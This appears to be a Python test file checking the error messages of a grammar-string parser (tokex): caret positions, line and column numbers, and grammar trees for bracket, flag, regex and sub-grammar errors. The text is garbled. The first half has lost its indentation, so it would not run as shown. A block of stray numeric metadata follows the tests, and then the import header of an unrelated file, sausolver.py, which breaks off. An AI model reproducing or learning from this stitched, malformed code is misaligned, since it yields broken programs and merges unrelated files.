gsec_line_col_re = re.compile("Line (\d+) Column (\d+)")
gsec_caret_line_re = re.compile(r"^ *\^+$")
def _parse_gsec(self, gsec):
""" Parses a grammar-string-error-context string """
lines = [line for line in gsec.split("\n") if line.strip()]
line_col_re_match = self.gsec_line_col_re.search(lines[0])
line = int(line_col_re_match.group(1))
column = int(line_col_re_match.group(2))
# Ensure the right amount of caret padding is present
self.assertEqual(lines[2].count(" "), column - 1)
num_carets = lines[2].count("^")
return {
"line": line,
"column": column,
"grammar_snippet": lines[1].lstrip(),
"num_carets": num_carets
}
def _parse_grammar_parsing_error_string(self, grammar_parsing_error):
gpe_str = str(grammar_parsing_error)
lines = gpe_str.split("\n")
intro_and_err_msg = lines[0]
err_msg = intro_and_err_msg.split(": ", 1)[1]
gsec_info = {}
current_line = 1
if self.gsec_line_col_re.search(gpe_str):
for line_idx, line in enumerate(lines[1:], start=current_line):
if self.gsec_caret_line_re.match(line):
break
else:
raise Exception("Caret line not found despite gsec apparently present")
gsec_info = self._parse_gsec("\n".join(lines[1: line_idx + 1]))
current_line = line_idx + 1
tree_info = {}
# If we have something else, it is the grammar tree
if len(lines) > current_line:
tree_info["grammar_tree"] = []
tree_info["tree_type"] = lines[current_line].split(" ", 1)[0]
for line in lines[current_line + 1: len(lines)]:
tree_info["grammar_tree"].append([line.count(" "), line.lstrip()])
return {
"err_msg": err_msg,
**gsec_info,
**tree_info
}
def get_exception(self, grammar_string, exception_type, allow_sub_grammar_definitions=True):
with self.assertRaises(exception_type) as cm:
functions.compile(grammar_string, allow_sub_grammar_definitions=allow_sub_grammar_definitions)
return cm.exception
def test_tokex_error_grammar_string_error_context(self):
# Test an error in the middle of a grammar
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ error $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.TokexError)
self.assertEqual(
self._parse_gsec(e.grammar_string_error_context()),
{
"line": 4,
"column": 3,
"grammar_snippet": "$ error $",
"num_carets": 5
}
)
# Test a grammar with an immediate error
grammar_string = textwrap.dedent('''error $ "test" "test" "test" ''')
e = self.get_exception(grammar_string, errors.TokexError)
self.assertEqual(
self._parse_gsec(e.grammar_string_error_context()),
{
"line": 1,
"column": 1,
"grammar_snippet": 'error $ "test" "test" "test" ',
"num_carets": 5
}
)
# Test a grammar with an error on a long line
grammar_string = textwrap.dedent('''
"1234567890 1234567890 1234567890 1234567890 1234567890 1234567890" error "1234567890 1234567890 1234567890 1234567890 1234567890 1234567890"
''')
e = self.get_exception(grammar_string, errors.TokexError)
self.assertEqual(
self._parse_gsec(e.grammar_string_error_context()),
{
"line": 2,
"column": 51,
"grammar_snippet": '7890 1234567890 1234567890 1234567890 1234567890" error "1234567890 1234567890 1234567890 1234567890 1234',
"num_carets": 5
}
)
def test_grammar_tokenizing_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ error_thrown $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.TokexError)
self.assertIn("tokenizing", str(e))
self.assertIn("error_thrown", str(e))
def test_unknown_grammar_token_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ error_thrown $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.UnknownGrammarTokenError)
self.assertIn("Encountered unknown grammar token: error_thrown", str(e))
self.assertEqual(
self._parse_gsec(e.grammar_string_error_context()),
{
"line": 4,
"column": 3,
"grammar_snippet": '$ error_thrown $',
"num_carets": 12
}
)
def test_grammar_parsing_error(self):
# Test an error with full tree/context
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ i. $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.GrammarParsingError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Invalid flag i given to <[Any String .]>, valid flags are: q, u",
"line": 4,
"column": 3,
"grammar_snippet": '$ i. $',
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>']
],
"num_carets": 2
})
# Test an error with no grammar tree
grammar_string = textwrap.dedent("""
)
""")
e = self.get_exception(grammar_string, errors.GrammarParsingError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra closing brackets given; found an extra: )",
"line": 2,
"column": 1,
"grammar_snippet": ")",
"num_carets": 1
})
# Test an error with no error context
e = errors.GrammarParsingError("Test error message")
e.grammar_string = "'test' #"
e.match_span_start = 7
e.match_span_end = 8
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Test error message",
"line": 1,
"column": 8,
"grammar_snippet": "'test' #",
"num_carets": 1
})
# Test an error with no grammar tree nor error context
e = errors.GrammarParsingError("Test error message")
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Test error message"
})
def test_invalid_grammar_token_flags_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ !. $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.InvalidGrammarTokenFlagsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Invalid flag ! given to <[Any String .]>, valid flags are: q, u",
"line": 4,
"column": 3,
"grammar_snippet": "$ !. $",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>']
],
"num_carets": 2
})
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ !i. $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.InvalidGrammarTokenFlagsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Invalid flags !, i given to <[Any String .]>, valid flags are: q, u",
"line": 4,
"column": 3,
"grammar_snippet": "$ !i. $",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>']
],
"num_carets": 3
})
def test_invalid_regex_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ ~[)~ $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.InvalidRegexError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Invalid regular expression given: [)",
"line": 4,
"column": 3,
"grammar_snippet": "$ ~[)~ $",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>']
],
"num_carets": 4
})
def test_mutually_exclusive_grammar_tokens_flags_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ si. $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.MutuallyExclusiveGrammarTokenFlagsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Mutually exclusive flags given to <[Any String .]>: i, s",
"line": 4,
"column": 3,
"grammar_snippet": "$ si. $",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>']
],
"num_carets": 3
})
def test_invalid_delimiter_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
<test: sep { . }>
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.InvalidDelimiterError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Cannot add iterator delimiters to <[Named Element <test: ...>]>",
"line": 4,
"column": 8,
"grammar_snippet": "<test: sep { . }>",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Named Element <test: ...>]>']
],
"num_carets": 5
})
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
(test: sep { . })
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.InvalidDelimiterError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Cannot add iterator delimiters to <[Named Section (test: ...)]>",
"line": 4,
"column": 8,
"grammar_snippet": "(test: sep { . })",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Named Section (test: ...)]>']
],
"num_carets": 5
})
def test_duplicate_delimiter_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
*(test: sep { . } sep { $ })
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.DuplicateDelimiterError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Multiple iterator delimiters defined for <[Zero or More *(test: ...)]>",
"line": 4,
"column": 19,
"grammar_snippet": "*(test: sep { . } sep { $ })",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Zero or More *(test: ...)]>'],
[1, '<[Iterator Delimiter sep {...}]>'],
[2, '<[Any String .]>']
],
"num_carets": 5
})
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
*(test: sep { . } 'test' sep { $ })
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.DuplicateDelimiterError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Multiple iterator delimiters defined for <[Zero or More *(test: ...)]>",
"line": 4,
"column": 26,
"grammar_snippet": "*(test: sep { . } 'test' sep { $ })",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Zero or More *(test: ...)]>'],
[1, '<[String Literal test]>'],
[1, '<[Iterator Delimiter sep {...}]>'],
[2, '<[Any String .]>']
],
"num_carets": 5
})
def test_extra_closing_brackets_error(self):
grammar_string = textwrap.dedent("""
'test' )
""")
e = self.get_exception(grammar_string, errors.ExtraClosingBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra closing brackets given; found an extra: )",
"line": 2,
"column": 8,
"grammar_snippet": "'test' )",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>']
],
"num_carets": 1
})
grammar_string = textwrap.dedent(")")
e = self.get_exception(grammar_string, errors.ExtraClosingBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Extra closing brackets given; found an extra: )",
"line": 1,
"column": 1,
"grammar_snippet": ")",
"num_carets": 1
})
def test_extra_opening_brackets_error(self):
    """ExtraOpeningBracketsError names the unclosed construct; the caret run covers its opening token(s)."""
    # Unclosed one-of set: '{' with no '}'.
    grammar_string = textwrap.dedent("{")
    e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Extra opening brackets given; <[One of Set {...}]> was not closed",
        "line": 1,
        "column": 1,
        "grammar_snippet": "{",
        "num_carets": 1,
        "grammar_tree": [
            [0, '<[One of Set {...}]>']
        ],
        "tree_type": "Element"
    })
    # Unclosed zero-or-more iterator: the whole '*(a:' opener is underlined.
    grammar_string = textwrap.dedent("*(a:")
    e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Extra opening brackets given; <[Zero or More *(a: ...)]> was not closed",
        "line": 1,
        "column": 1,
        "grammar_snippet": "*(a:",
        "num_carets": 4,
        "grammar_tree": [
            [0, '<[Zero or More *(a: ...)]>']
        ],
        "tree_type": "Element"
    })
    # Unclosed named section.
    grammar_string = textwrap.dedent("(section:")
    e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Extra opening brackets given; <[Named Section (section: ...)]> was not closed",
        "line": 1,
        "column": 1,
        "grammar_snippet": "(section:",
        "num_carets": 9,
        "grammar_tree": [
            [0, '<[Named Section (section: ...)]>']
        ],
        "tree_type": "Element"
    })
    # A fully-closed construct before the unclosed one still appears in the tree.
    grammar_string = textwrap.dedent("+(abc: 'test' ) <test:")
    e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Extra opening brackets given; <[Named Element <test: ...>]> was not closed",
        "line": 1,
        "column": 17,
        "grammar_snippet": "+(abc: 'test' ) <test:",
        "num_carets": 6,
        "grammar_tree": [
            [0, '<[One or More +(abc: ...)]>'],
            [1, '<[String Literal test]>'],
            [0, '<[Named Element <test: ...>]>']
        ],
        "tree_type": "Element"
    })
    # Elements parsed inside the unclosed construct are reported as its children.
    grammar_string = textwrap.dedent("'test' ?( 'test'")
    e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Extra opening brackets given; <[Zero or One ?(...)]> was not closed",
        "line": 1,
        "column": 8,
        "grammar_snippet": "'test' ?( 'test'",
        "num_carets": 2,
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[Zero or One ?(...)]>'],
            [1, '<[String Literal test]>'],
        ],
        "tree_type": "Element"
    })
    # Unclosed one-or-more iterator after a valid element.
    grammar_string = textwrap.dedent("'test' +(a:")
    e = self.get_exception(grammar_string, errors.ExtraOpeningBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Extra opening brackets given; <[One or More +(a: ...)]> was not closed",
        "line": 1,
        "column": 8,
        "grammar_snippet": "'test' +(a:",
        "num_carets": 4,
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[One or More +(a: ...)]>'],
        ],
        "tree_type": "Element"
    })
def test_mismatched_brackets_error(self):
    """MismatchedBracketsError names both the wrong closer and the construct awaiting its closer.

    Fix: the original contained the "'test' { . >" case twice, byte for byte;
    the redundant duplicate has been removed.
    """
    # ')' used to close a '{' set.
    grammar_string = textwrap.dedent("'test' { . )")
    e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Mismatched brackets given; got: ), expecting closing brackets for: <[One of Set {...}]>",
        "line": 1,
        "column": 12,
        "grammar_snippet": "'test' { . )",
        "num_carets": 1,
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[One of Set {...}]>'],
            [1, '<[Any String .]>']
        ],
        "tree_type": "Element"
    })
    # '>' used to close a '{' set.
    grammar_string = textwrap.dedent("'test' { . >")
    e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Mismatched brackets given; got: >, expecting closing brackets for: <[One of Set {...}]>",
        "line": 1,
        "column": 12,
        "grammar_snippet": "'test' { . >",
        "num_carets": 1,
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[One of Set {...}]>'],
            [1, '<[Any String .]>']
        ],
        "tree_type": "Element"
    })
    # Trailing tokens after the mismatch do not change the report.
    grammar_string = textwrap.dedent("'test' { . > $")
    e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Mismatched brackets given; got: >, expecting closing brackets for: <[One of Set {...}]>",
        "line": 1,
        "column": 12,
        "grammar_snippet": "'test' { . > $",
        "num_carets": 1,
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[One of Set {...}]>'],
            [1, '<[Any String .]>']
        ],
        "tree_type": "Element"
    })
    # '>' used to close a '*(a:' iterator.
    grammar_string = textwrap.dedent("'test' *(a: . > $")
    e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Mismatched brackets given; got: >, expecting closing brackets for: <[Zero or More *(a: ...)]>",
        "line": 1,
        "column": 15,
        "grammar_snippet": "'test' *(a: . > $",
        "num_carets": 1,
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[Zero or More *(a: ...)]>'],
            [1, '<[Any String .]>']
        ],
        "tree_type": "Element"
    })
    # '}' used to close a '+(a:' iterator.
    grammar_string = textwrap.dedent("'test' +(a: . } $")
    e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Mismatched brackets given; got: }, expecting closing brackets for: <[One or More +(a: ...)]>",
        "line": 1,
        "column": 15,
        "grammar_snippet": "'test' +(a: . } $",
        "num_carets": 1,
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[One or More +(a: ...)]>'],
            [1, '<[Any String .]>']
        ],
        "tree_type": "Element"
    })
    # '}' used to close a named element '<a:'.
    grammar_string = textwrap.dedent("'test' <a: . } $")
    e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Mismatched brackets given; got: }, expecting closing brackets for: <[Named Element <a: ...>]>",
        "line": 1,
        "column": 14,
        "grammar_snippet": "'test' <a: . } $",
        "num_carets": 1,
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[Named Element <a: ...>]>'],
            [1, '<[Any String .]>']
        ],
        "tree_type": "Element"
    })
    # ')' used to close a named element '<a:'.
    grammar_string = textwrap.dedent("'test' <a: . ) $")
    e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Mismatched brackets given; got: ), expecting closing brackets for: <[Named Element <a: ...>]>",
        "line": 1,
        "column": 14,
        "grammar_snippet": "'test' <a: . ) $",
        "num_carets": 1,
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[Named Element <a: ...>]>'],
            [1, '<[Any String .]>']
        ],
        "tree_type": "Element"
    })
    # The innermost open construct (the delimiter, not the iterator) is blamed.
    grammar_string = textwrap.dedent("*(a: 'test' sep { . ) $")
    e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Mismatched brackets given; got: ), expecting closing brackets for: <[Iterator Delimiter sep {...}]>",
        "line": 1,
        "column": 21,
        "grammar_snippet": "*(a: 'test' sep { . ) $",
        "num_carets": 1,
        "grammar_tree": [
            [0, '<[Zero or More *(a: ...)]>'],
            [1, '<[String Literal test]>'],
            [1, '<[Iterator Delimiter sep {...}]>'],
            [2, '<[Any String .]>']
        ],
        "tree_type": "Element"
    })
def test_named_element_contents_error(self):
    """NamedElementContentsError: a named element holds exactly one singular element."""
    # Test passing two contents
    grammar_string = textwrap.dedent("""
    'test' 'test' 'test'
    . . .
    $ <test: 'test' .> $
    "test" "test" "test"
    """)
    e = self.get_exception(grammar_string, errors.NamedElementContentsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "<[Named Element <test: ...>]> cannot contain more than one element, already contains: <[String Literal test]>",
        "line": 4,
        "column": 17,
        "grammar_snippet": "$ <test: 'test' .> $",
        "tree_type": "Element",
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[String Literal test]>'],
            [0, '<[String Literal test]>'],
            [0, '<[Any String .]>'],
            [0, '<[Any String .]>'],
            [0, '<[Any String .]>'],
            [0, '<[Newline $]>'],
            [0, '<[Named Element <test: ...>]>'],
            [1, '<[String Literal test]>']
        ],
        "num_carets": 1
    })
    # Test passing non-singular elements
    # A one-of set is not a singular element, so it cannot be the content.
    grammar_string = textwrap.dedent("""
    'test' 'test' 'test'
    . . .
    $ <test: {'test' .}> $
    "test" "test" "test"
    """)
    e = self.get_exception(grammar_string, errors.NamedElementContentsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "<[Named Element <test: ...>]> can only contain singular elements, not <[One of Set {...}]>",
        "line": 4,
        "column": 10,
        "grammar_snippet": "$ <test: {'test' .}> $",
        "tree_type": "Element",
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[String Literal test]>'],
            [0, '<[String Literal test]>'],
            [0, '<[Any String .]>'],
            [0, '<[Any String .]>'],
            [0, '<[Any String .]>'],
            [0, '<[Newline $]>'],
            [0, '<[Named Element <test: ...>]>']
        ],
        "num_carets": 1
    })
    # A named section is also non-singular; the caret run covers its '(a:' opener.
    grammar_string = textwrap.dedent("""
    'test' 'test' 'test'
    . . .
    $ <test: (a:'test' .)> $
    "test" "test" "test"
    """)
    e = self.get_exception(grammar_string, errors.NamedElementContentsError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "<[Named Element <test: ...>]> can only contain singular elements, not <[Named Section (a: ...)]>",
        "line": 4,
        "column": 10,
        "grammar_snippet": "$ <test: (a:'test' .)> $",
        "tree_type": "Element",
        "grammar_tree": [
            [0, '<[String Literal test]>'],
            [0, '<[String Literal test]>'],
            [0, '<[String Literal test]>'],
            [0, '<[Any String .]>'],
            [0, '<[Any String .]>'],
            [0, '<[Any String .]>'],
            [0, '<[Newline $]>'],
            [0, '<[Named Element <test: ...>]>']
        ],
        "num_carets": 3
    })
def test_sub_grammars_disabled_error(self):
    """SubGrammarsDisabledError is raised for 'def' blocks when the feature flag is off."""
    grammar_string = textwrap.dedent("""
    def test { . }
    'test' 'test' 'test'
    . . .
    $ <test: .> $
    "test" "test" "test"
    """)
    # Third argument disables sub-grammar definitions (allow_sub_grammar_definitions=False).
    e = self.get_exception(grammar_string, errors.SubGrammarsDisabledError, False)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Cannot define sub grammar test while allow_sub_grammar_definitions is False",
        "line": 2,
        "column": 1,
        "grammar_snippet": "def test { . }",
        "num_carets": 10
    })
def test_sub_grammar_scope_error(self):
    """SubGrammarScopeError: 'def' is legal only at global scope or inside another sub grammar."""
    # Definition nested inside a one-of set.
    grammar_string = textwrap.dedent("""
    'test' 'test' 'test'
    . . .
    { def testg { . } }
    "test" "test" "test"
    """)
    e = self.get_exception(grammar_string, errors.SubGrammarScopeError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Error defining sub grammar testg. Sub Grammars can only be defined globally or within other sub grammars, not inside a: <[One of Set {...}]>",
        "line": 4,
        "column": 3,
        "grammar_snippet": "{ def testg { . } }",
        "num_carets": 11
    })
    # Definition nested inside a named element; nested sub grammars (q/q2)
    # are themselves legal and show up in the reported "Sub" tree.
    grammar_string = textwrap.dedent("""
    def q {
        def q2{ $ }
        .
    }
    'test' 'test' 'test'
    . . .
    <test: def testg { . } >
    "test" "test" "test"
    """)
    e = self.get_exception(grammar_string, errors.SubGrammarScopeError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Error defining sub grammar testg. Sub Grammars can only be defined globally or within other sub grammars, not inside a: <[Named Element <test: ...>]>",
        "line": 9,
        "column": 8,
        "grammar_snippet": "<test: def testg { . } >",
        "num_carets": 11,
        "grammar_tree": [
            [0, '<[Sub Grammar def q { ... }]>'],
            [1, '<[Any String .]>'],
            [1, '<[Sub Grammar def q2 { ... }]>'],
            [2, '<[Newline $]>']
        ],
        "tree_type": "Sub"
    })
    # Definition nested two levels deep (set inside an optional construct).
    grammar_string = textwrap.dedent("""
    def q { . }
    'test' 'test' 'test'
    . . .
    ?( { def testg { . } } )
    "test" "test" "test"
    """)
    e = self.get_exception(grammar_string, errors.SubGrammarScopeError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Error defining sub grammar testg. Sub Grammars can only be defined globally or within other sub grammars, not inside a: <[One of Set {...}]>",
        "line": 5,
        "column": 6,
        "grammar_snippet": "?( { def testg { . } } )",
        "num_carets": 11,
        "grammar_tree": [
            [0, '<[Sub Grammar def q { ... }]>'],
            [1, '<[Any String .]>']
        ],
        "tree_type": "Sub"
    })
def test_undefined_sub_grammar_error(self):
    """UndefinedSubGrammarError: calling a sub grammar that is not visible at the call site."""
    # Calling a name that was never defined.
    grammar_string = textwrap.dedent("""
    def q { . }
    'test' 'test' 'test'
    . . .
    r()
    "test" "test" "test"
    """)
    e = self.get_exception(grammar_string, errors.UndefinedSubGrammarError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Sub grammar r does not exist",
        "line": 5,
        "column": 1,
        "grammar_snippet": "r()",
        "num_carets": 3,
        "grammar_tree": [
            [0, '<[Sub Grammar def q { ... }]>'],
            [1, '<[Any String .]>']
        ],
        "tree_type": "Sub"
    })
    # A sub grammar is not visible inside its own definition body.
    grammar_string = textwrap.dedent("""
    def q {
        q()
    }
    'test' 'test' 'test'
    . . .
    "test" "test" "test"
    """)
    e = self.get_exception(grammar_string, errors.UndefinedSubGrammarError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Sub grammar q does not exist",
        "line": 3,
        "column": 5,
        "grammar_snippet": "q()",
        "num_carets": 3
    })
    # A nested definition (r2 inside q) is scoped to q and is not visible
    # at the global level.
    grammar_string = textwrap.dedent("""
    def q {
        def r2 { . }
    }
    r2()
    'test' 'test' 'test'
    . . .
    "test" "test" "test"
    """)
    e = self.get_exception(grammar_string, errors.UndefinedSubGrammarError)
    error_details = self._parse_grammar_parsing_error_string(e)
    self.assertDictEqual(error_details, {
        "err_msg": "Sub grammar r2 does not exist",
        "line": 5,
        "column": 1,
        "grammar_snippet": "r2()",
        "num_carets": 4,
        "grammar_tree": [
            [0, '<[Sub Grammar def q { ... }]>'],
            [1, '<[Sub Grammar def r2 { ... }]>'],
            [2, '<[Any String .]>']
        ],
        "tree_type": "Sub"
    })
| 38.566946
| 175
| 0.49227
| 3,474
| 36,870
| 5.001439
| 0.068221
| 0.054331
| 0.050417
| 0.048691
| 0.825612
| 0.815597
| 0.794993
| 0.771626
| 0.74659
| 0.708835
| 0
| 0.022319
| 0.355926
| 36,870
| 955
| 176
| 38.60733
| 0.709353
| 0.015487
| 0
| 0.732571
| 0
| 0.005714
| 0.35252
| 0.000799
| 0
| 0
| 0
| 0
| 0.054857
| 1
| 0.021714
| false
| 0
| 0.009143
| 0
| 0.038857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
21f514d391a1c943fd3bcea268cb1d460d307ae4
| 74,673
|
py
|
Python
|
mwptoolkit/model/Seq2Tree/sausolver.py
|
ShubhamAnandJain/MWP-CS229
|
ce86233504fdb37e104a3944fd81d4606fbfa621
|
[
"MIT"
] | 71
|
2021-03-08T06:06:15.000Z
|
2022-03-30T11:59:37.000Z
|
mwptoolkit/model/Seq2Tree/sausolver.py
|
ShubhamAnandJain/MWP-CS229
|
ce86233504fdb37e104a3944fd81d4606fbfa621
|
[
"MIT"
] | 13
|
2021-09-07T12:38:23.000Z
|
2022-03-22T15:08:16.000Z
|
mwptoolkit/model/Seq2Tree/sausolver.py
|
ShubhamAnandJain/MWP-CS229
|
ce86233504fdb37e104a3944fd81d4606fbfa621
|
[
"MIT"
] | 21
|
2021-02-16T07:46:36.000Z
|
2022-03-23T13:41:33.000Z
|
# -*- encoding: utf-8 -*-
# @Author: Yihuai Lan
# @Time: 2021/08/21 04:59:55
# @File: sausolver.py
import random
import torch
from torch import nn
import copy
from mwptoolkit.module.Encoder.rnn_encoder import BasicRNNEncoder
from mwptoolkit.module.Embedder.basic_embedder import BaiscEmbedder
from mwptoolkit.module.Decoder.tree_decoder import SARTreeDecoder
from mwptoolkit.module.Layer.tree_layers import NodeGenerater, SubTreeMerger, TreeNode, TreeEmbedding
from mwptoolkit.module.Layer.tree_layers import Prediction, GenerateNode, Merge, SemanticAlignmentModule
from mwptoolkit.module.Strategy.beam_search import TreeBeam
from mwptoolkit.loss.masked_cross_entropy_loss import MaskedCrossEntropyLoss, masked_cross_entropy
from mwptoolkit.loss.mse_loss import MSELoss
